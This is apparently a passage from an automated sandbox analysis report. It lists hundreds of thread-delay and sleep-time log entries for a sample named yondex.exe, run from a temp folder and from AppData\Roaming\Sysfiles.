                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559321
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559163
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559015
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558889
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558757
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558594
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558451
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558315
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558166
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558015
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557875
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557742
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557605
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557471
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557203
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557062
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556943
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556811
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556684
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556500
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556354
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556219
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556062
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555931
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555797
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555686
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555529
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555364
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555219
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555085
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554984
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554874
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554765
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554656
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554547
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554437
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554218
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554109
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554000
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 553890
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeWindow / User API: threadDelayed 1129Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeWindow / User API: threadDelayed 3431Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeWindow / User API: threadDelayed 5507
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeWindow / User API: threadDelayed 2391
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeWindow / User API: threadDelayed 486
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7536Thread sleep count: 1129 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -599891s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7536Thread sleep count: 3431 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -599766s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -599641s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -599531s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -599422s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -599304s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -599202s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -599094s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -598967s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7240Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -598858s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -598745s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -598578s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -598453s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -598342s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -598234s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -598125s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -598015s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -597906s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -597797s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -597687s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -597544s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -597437s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -597328s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -597172s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -596953s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -596750s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -596500s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe TID: 7524Thread sleep time: -596203s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7744Thread sleep count: 161 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -599688s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -599469s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -599266s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -599104s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -598907s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7616Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -598672s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -598438s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -598016s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -597813s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -597610s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -597422s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -597219s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -597030s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -596844s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -596657s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -596438s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -596275s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -596104s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -595922s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -595563s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -595375s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -595172s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -594938s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -594703s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7732Thread sleep time: -594438s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8024Thread sleep count: 153 > 30
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -599810s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -599562s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -599328s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -599156s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -599000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 7916Thread sleep time: -120000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -598796s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -598546s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -598359s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -598164s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -597843s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -597640s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -597455s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -597281s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -597124s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -596921s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -596718s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -596542s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -596328s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -596156s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -595994s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -595734s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -595375s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -595140s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -594906s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8020Thread sleep time: -594701s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -11990383647911201s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8176Thread sleep count: 5507 > 30
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -599469s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -599265s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -599031s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -598812s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -598625s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8112Thread sleep time: -180000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -598406s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -598187s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -598031s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -597765s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -597574s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -597390s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -597203s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -597015s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -596890s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -596778s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -596658s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -596498s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -596338s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -596217s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -596052s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -595922s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -595807s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -595685s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -595546s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -595378s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -595234s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -595102s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -594961s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -594806s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -594661s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -594500s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -594386s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -594219s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -594062s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -593936s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -593797s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -593640s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -593530s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -593393s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -593234s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -593104s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -592937s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -592820s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -592672s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -592515s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -592375s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -592234s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -592098s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -591922s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -591783s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -591640s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -591469s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -591312s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -591186s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -591047s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -590911s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -590777s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -590653s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -590530s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -590390s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -590250s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -590109s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -589993s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -589859s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -589723s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -589585s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -589437s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -589281s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -589156s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -589026s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -588901s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -588763s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -588621s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -588475s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -588337s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -588210s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -588071s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -587943s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -587781s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -587625s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -587484s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -587328s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -587202s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -587047s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -586906s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -586778s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -586609s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -586437s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -586286s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -586154s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -586015s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -585875s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -585719s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -585578s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -585437s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -585094s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -584903s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -584765s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -584647s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -584509s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -584346s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -584203s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -584062s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -583908s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -583750s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -583621s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -583498s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -583359s >= -30000s
